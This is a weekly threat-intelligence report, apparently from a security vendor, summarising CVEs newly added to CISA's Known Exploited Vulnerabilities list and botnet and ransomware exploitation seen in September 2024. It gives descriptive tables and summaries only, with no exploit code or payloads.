/
/
The Impact of CISA's Latest Vulnerabilities on Cybersecurity Practices

The Impact of CISA's Latest Vulnerabilities on Cybersecurity Practices

September 20, 2024
Executive Summary

This week, the CISA KEV list expanded with 11 new CVEs, four of which are ancient vulnerabilities tied to Adobe Flash Player. Despite being over ten years old, these vulnerabilities CVE-2014-0497, CVE-2014-0502, CVE-2013-0643, and CVE-2013-0648 have resurfaced with renewed urgency, highlighting a persistent threat that continues to jeopardize security.  

Microsoft has confirmed that the spoofing vulnerability CVE-2024-43461, affecting Windows MSHTML, was exploited by the Void Banshee threat actor as part of an attack chain to deliver Atlantida malware. In addition to this, two older Microsoft CVEs, CVE-2020-0618 and CVE-2019-1069, were also added to the CISA KEV list highlighting the ongoing security risks associated with outdated software.  

Ivanti faced a tough week as two critical vulnerabilities, CVE-2024-8963 and CVE-2024-8190, affecting its Cloud Services Appliance were actively exploited in the wild and added to the CISA KEV list.

The Mirai botnet is ramping up its aggressive exploitation efforts, persistently targeting LB-Link BL devices and TP-Link Archer AX21 routers. Meanwhile, the IoT_Reaper botnet remains operational, continuously taking advantage of an eight-year-old vulnerability in MVPower CCTV DVR models.

Trending / Critical Vulnerabilities

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2024-43461
A high severity spoofing vulnerability in the Windows MSHTML platform, rated with an EPSS score of 0.16239, has been leveraged by the Void Banshee threat actor group to deploy Atlantida malware. This vulnerability is now on the CISA Known Exploited Vulnerabilities (KEV) list, underscoring its importance and the necessity for prompt mitigation.  

CVE-2024-6670
A critical SQL injection vulnerability in WhatsUp Gold, scoring 0.95634 on the EPSS, enables attackers to bypass authentication and access encrypted user passwords without needing credentials. This issue has been included in the CISA Known Exploited Vulnerabilities (KEV) list, highlighting the urgent need for remediation due to the presence of an active proof-of-concept (POC) exploit.

CVE-2024-27348
Recently added to CISA’s Known Exploited Vulnerabilities (KEV), the critical flaw in Apache HugeGraph-server, with a CVSS score of 9.8 and a low EPSS score of 0.0021 enables authenticated attackers to execute arbitrary code on the affected server with SYSTEM privileges.

CVE-2024-8963
A critical path traversal vulnerability in the Ivanti Cloud Services Appliance, with a CVSS score of 9.8, allows remote authenticated attackers to access restricted functionality on vulnerable systems. This vulnerability was recently added to the CISA Known Exploited Vulnerabilities (KEV) list, highlighting its severity.

CVE-2024-8190
A critical OS command injection vulnerability in the Ivanti Cloud Service Appliance, with an EPSS score of 0.15116, permits remote authenticated attackers to execute code remotely. It has also been listed recently in the CISA Known Exploited Vulnerabilities (KEV) catalog.

CVE-2022-21445
A critical remote code execution vulnerability in Oracle JDeveloper, rated CVSS 9.8 with an EPSS score of 0.00705, allows attackers to execute arbitrary code on vulnerable systems. This flaw has been added to the CISA Known Exploited Vulnerabilities (KEV) list for prioritized remediation.

CVE-2020-14644
A critical impact remote code execution vulnerability in Oracle WebLogic Server, rated CVSS 9.8 with an EPSS score of 0.04636, has been exploited in the wild, allowing attackers to gain full control of affected systems. It has been added to the CISA KEV list for critical response.

CVE-2020-0618
A high-severity remote code execution vulnerability in Microsoft SQL Server, recently added to the CISA KEV list, carries a high EPSS score of 0.97335. It enables attackers to execute arbitrary code within the context of the Report Server service account, posing a significant security risk.

CVE-2019-1069
A high-severity elevation of privilege vulnerability in Microsoft Windows Task Scheduler, with a low EPSS score of 0.00434, was previously exploited by Conti and Ryuk ransomware. This vulnerability has recently been added to the CISA Known Exploited Vulnerabilities (KEV) list, highlighting its continued risk.

CVE-2014-0497, CVE-2014-0502, CVE-2013-0643, and CVE-2013-0648
Persistent high-severity vulnerabilities in Adobe Flash Player, dating back a decade, still pose a serious risk by allowing remote attackers to run arbitrary code on compromised systems. The CISA Known Exploited Vulnerabilities (KEV) list has now been updated to include these vulnerabilities, underscoring the critical need for immediate mitigation.

Exploit Activity and Mass Scanning Observed on Cytellite Sensors

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Vulnerabilities Product Severity Title Exploited – in the-wild CISA KEV
CVE-2024-4577 PHP-CGI on Windows High Critical argument injection vulnerability in PHP on Windows servers True True
CVE-2024-7029 AVTECH SECURITY Corporation IP camera High Command Injection vulnerability in AVTECH SECURITY Corporation IP camera AVM1203 firmware through FullImg-1023-1007-1011-1009 True False
CVE-2023-4415 Ruijie RG-EW1200G 07161417 r483 High Improper Authentication vulnerability in Ruijie RG-EW1200G 07161417 r483 False False
CVE-2023-33010 Zyxel ATP series firmware Critical Buffer overflow vulnerability in the ID processing function in Zyxel ATP series firmware versions leads to denial of service or remote code execution on affected device True True
CVE-2023-26801 LB-LINK Critical Command injection vulnerability in LB-LINK devices. True False
CVE-2023-1389 TP-Link Archer AX-21 High Command Injection Vulnerability in TP-Link Archer AX-21. True True
CVE-2022-34045 Wavlink Devices Critical Hardcoded encryption/decryption key vulnerability in Wavlink False False
CVE-2022-30489 Wavlink Devices Medium Cross-site scripting vulnerability in Wavlink Devices False False
CVE-2022-30023 Tenda Devices High Command injection vulnerability via the Ping function in Tenda Products False False
CVE-2022-25168 Apache Hadoop Critical Command injection vulnerability in org.apache.hadoop.fs.FileUtil.unTarUsingTar in Apache Hadoop False False
CVE-2022-24847 GeoServer High Improper input validation vulnerability in GeoServer leads to arbitrary code execution False False
CVE-2022-41040 Microsoft Exchange Server High Server-Side Request Forgery Vulnerability in Microsoft Exchange Server True True
CVE-2022-22947 Spring Cloud Gateway Critical Remote code execution vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ True True

Vulnerabilities abused by Botnet

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

Vulnerability Product Title Exploit Abused by Botnet
CVE-2023-26801 LB-LINK BL Devices Command injection vulnerability in LB-LINK BL-AC1900_2.0 1.0.1, BL-WR9000 2.4.9, BL-X26 1.2.5, and BL-LTE300 1.0.8 True Mirai
CVE-2023-1389 TP-Link Archer AX21 An unauthenticated command injection vulnerability found in the TP-Link Archer AX21 WiFi router True AGoent,
Gafgyt,
Moobot,
Miori,
Mirai,
Condi
CVE-2016-20016 MVPower CCTV DVR models Remote code execution vulnerability in MVPower CCTVDVR models True IoT-Reaper

Vulnerabilities Abused by Malware

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.  

CVE-2024-43461
According to recent findings by The Register, the Void Banshee threat actor exploited this spoofing vulnerability in Windows MSHTML as a zero-day to deploy Atlantida malware. This attack was part of a broader exploit chain that included CVE-2024-38112, another spoofing flaw.

CVE-2023-48788
Recent investigations by Bitdefender revealed that this critical SQL injection vulnerability in Fortinet's EMS systems was exploited by Medusa ransomware to gain initial access.

Vulnerability Severity Title Patch Targeted By Malware OSS
CVE-2024-43461 High Spoofing vulnerability in Windows MSHTML True Void Banshee APT,
Atlantida
False
CVE-2023-48788 Critical SQL Injection Vulnerability in Fortinet FortiClientEMS leads to code execution via specially crafted packets True Medusa False

PRE-NVD Observed for this week

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

CVE-ID Type of Vulnerability Product Reference
CVE-2024-7565 Directory Traversal SMARTBEAR SoapUI Resource
CVE-2024-43689 Stack-based buffer overflow ELECOM wireless LAN routers and wireless access points Resource
CVE-2024-30377 Privilege Escalation G DATA Total Security Resource
CVE-2024-2046 Arbitrary local file read Telegram 10.8.2 Resource
CVE-2024-8159 Out-of-bounds read Visteon Infotainment Resource

External References

  1. https://www.cisa.gov/news-events/alerts/2024/09/18/cisa-adds-five-known-exploited-vulnerabilities-catalog  
  2. https://www.cisa.gov/news-events/alerts/2024/09/17/cisa-adds-four-known-exploited-vulnerabilities-catalog  
  3. https://www.cisa.gov/news-events/alerts/2024/09/19/cisa-adds-one-known-exploited-vulnerability-catalog
  4. https://www.theregister.com/2024/09/17/microsoft_zero_day_spoofing_flaw/
  5. https://www.cisa.gov/news-events/alerts/2024/09/16/cisa-adds-two-known-exploited-vulnerabilities-catalog  
  6. https://www.bitdefender.com/blog/businessinsights/medusa-ransomware-a-growing-threat-with-a-bold-online-presence/

Subscribe to our Reports

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Latest Reports

Weekly Reports